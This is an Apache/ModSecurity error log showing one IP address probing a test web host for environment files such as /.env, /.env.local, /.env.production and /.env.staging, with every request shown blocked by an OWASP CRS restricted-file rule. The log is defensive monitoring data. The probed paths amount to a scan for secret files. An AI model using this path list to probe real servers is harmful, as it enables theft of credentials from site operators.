[Fri Jan 16 03:13:55.496215 2026] [:error] [pid 1444033] [client 45.148.10.246:46826] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWme49LJkp65ULFQ2YYgjAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env
[Fri Jan 16 03:13:55.496446 2026] [:error] [pid 1444033] [client 45.148.10.246:46826] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWme49LJkp65ULFQ2YYgjAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env
[Fri Jan 16 03:13:55.496608 2026] [:error] [pid 1444033] [client 45.148.10.246:46826] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWme49LJkp65ULFQ2YYgjAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env
[Fri Jan 16 03:13:55.707783 2026] [:error] [pid 1444034] [client 45.148.10.246:46842] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWme4-RfEYyDES-ZFL4gfgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.local
[Fri Jan 16 03:13:55.708017 2026] [:error] [pid 1444034] [client 45.148.10.246:46842] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWme4-RfEYyDES-ZFL4gfgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.local
[Fri Jan 16 03:13:55.708169 2026] [:error] [pid 1444034] [client 45.148.10.246:46842] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWme4-RfEYyDES-ZFL4gfgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.local
[Fri Jan 16 03:13:55.884701 2026] [:error] [pid 1444032] [client 45.148.10.246:46850] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local/"] [unique_id "aWme4-kMvq8uPO2ZciWofQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.local/
[Fri Jan 16 03:13:55.884939 2026] [:error] [pid 1444032] [client 45.148.10.246:46850] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local/"] [unique_id "aWme4-kMvq8uPO2ZciWofQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.local/
[Fri Jan 16 03:13:55.885103 2026] [:error] [pid 1444032] [client 45.148.10.246:46850] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local/"] [unique_id "aWme4-kMvq8uPO2ZciWofQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.local/
[Fri Jan 16 03:13:56.067063 2026] [:error] [pid 1444226] [client 45.148.10.246:46860] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWme5GcpoCUgeFICb0bczwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.local
[Fri Jan 16 03:13:56.067321 2026] [:error] [pid 1444226] [client 45.148.10.246:46860] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWme5GcpoCUgeFICb0bczwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.local
[Fri Jan 16 03:13:56.068277 2026] [:error] [pid 1444226] [client 45.148.10.246:46860] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWme5GcpoCUgeFICb0bczwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.local
[Fri Jan 16 03:13:56.813265 2026] [:error] [pid 1444040] [client 45.148.10.246:46866] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWme5Pn_5sIyKhJ5GAzXpwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.production
[Fri Jan 16 03:13:56.813499 2026] [:error] [pid 1444040] [client 45.148.10.246:46866] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWme5Pn_5sIyKhJ5GAzXpwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.production
[Fri Jan 16 03:13:56.813673 2026] [:error] [pid 1444040] [client 45.148.10.246:46866] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWme5Pn_5sIyKhJ5GAzXpwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.production
[Fri Jan 16 03:13:57.439255 2026] [:error] [pid 1444034] [client 45.148.10.246:46900] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod/"] [unique_id "aWme5eRfEYyDES-ZFL4gfwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.prod/
[Fri Jan 16 03:13:57.439479 2026] [:error] [pid 1444034] [client 45.148.10.246:46900] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod/"] [unique_id "aWme5eRfEYyDES-ZFL4gfwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.prod/
[Fri Jan 16 03:13:57.439637 2026] [:error] [pid 1444034] [client 45.148.10.246:46900] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod/"] [unique_id "aWme5eRfEYyDES-ZFL4gfwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.prod/
[Fri Jan 16 03:13:57.587894 2026] [:error] [pid 1444032] [client 45.148.10.246:46906] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aWme5ekMvq8uPO2ZciWofgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.prod
[Fri Jan 16 03:13:57.588121 2026] [:error] [pid 1444032] [client 45.148.10.246:46906] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aWme5ekMvq8uPO2ZciWofgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.prod
[Fri Jan 16 03:13:57.588287 2026] [:error] [pid 1444032] [client 45.148.10.246:46906] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aWme5ekMvq8uPO2ZciWofgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.prod
[Fri Jan 16 03:13:57.744486 2026] [:error] [pid 1444226] [client 45.148.10.246:46922] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aWme5WcpoCUgeFICb0bc0AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.env.prod
[Fri Jan 16 03:13:57.744706 2026] [:error] [pid 1444226] [client 45.148.10.246:46922] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aWme5WcpoCUgeFICb0bc0AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.env.prod
[Fri Jan 16 03:13:57.744862 2026] [:error] [pid 1444226] [client 45.148.10.246:46922] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aWme5WcpoCUgeFICb0bc0AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.env.prod
[Fri Jan 16 03:13:57.960340 2026] [:error] [pid 1444040] [client 45.148.10.246:46932] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWme5fn_5sIyKhJ5GAzXqAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging
[Fri Jan 16 03:13:57.960609 2026] [:error] [pid 1444040] [client 45.148.10.246:46932] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWme5fn_5sIyKhJ5GAzXqAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging
[Fri Jan 16 03:13:57.960787 2026] [:error] [pid 1444040] [client 45.148.10.246:46932] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWme5fn_5sIyKhJ5GAzXqAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging
[Fri Jan 16 03:13:58.109590 2026] [:error] [pid 1444031] [client 45.148.10.246:46940] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging/"] [unique_id "aWme5n-9MmrgwjmYTAJQYwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging/
[Fri Jan 16 03:13:58.109858 2026] [:error] [pid 1444031] [client 45.148.10.246:46940] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging/"] [unique_id "aWme5n-9MmrgwjmYTAJQYwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging/
[Fri Jan 16 03:13:58.110041 2026] [:error] [pid 1444031] [client 45.148.10.246:46940] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging/"] [unique_id "aWme5n-9MmrgwjmYTAJQYwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging/
[Fri Jan 16 03:13:58.272734 2026] [:error] [pid 1444033] [client 45.148.10.246:46950] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWme5tLJkp65ULFQ2YYgjQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.staging
[Fri Jan 16 03:13:58.272998 2026] [:error] [pid 1444033] [client 45.148.10.246:46950] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWme5tLJkp65ULFQ2YYgjQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.staging
[Fri Jan 16 03:13:58.273163 2026] [:error] [pid 1444033] [client 45.148.10.246:46950] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWme5tLJkp65ULFQ2YYgjQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.staging
[Fri Jan 16 03:13:58.432611 2026] [:error] [pid 1444034] [client 45.148.10.246:46956] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWme5uRfEYyDES-ZFL4ggAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.staging
[Fri Jan 16 03:13:58.432833 2026] [:error] [pid 1444034] [client 45.148.10.246:46956] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWme5uRfEYyDES-ZFL4ggAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.staging
[Fri Jan 16 03:13:58.432985 2026] [:error] [pid 1444034] [client 45.148.10.246:46956] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWme5uRfEYyDES-ZFL4ggAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.staging
[Fri Jan 16 03:13:58.600260 2026] [:error] [pid 1444032] [client 45.148.10.246:46958] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aWme5ukMvq8uPO2ZciWofwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.stage
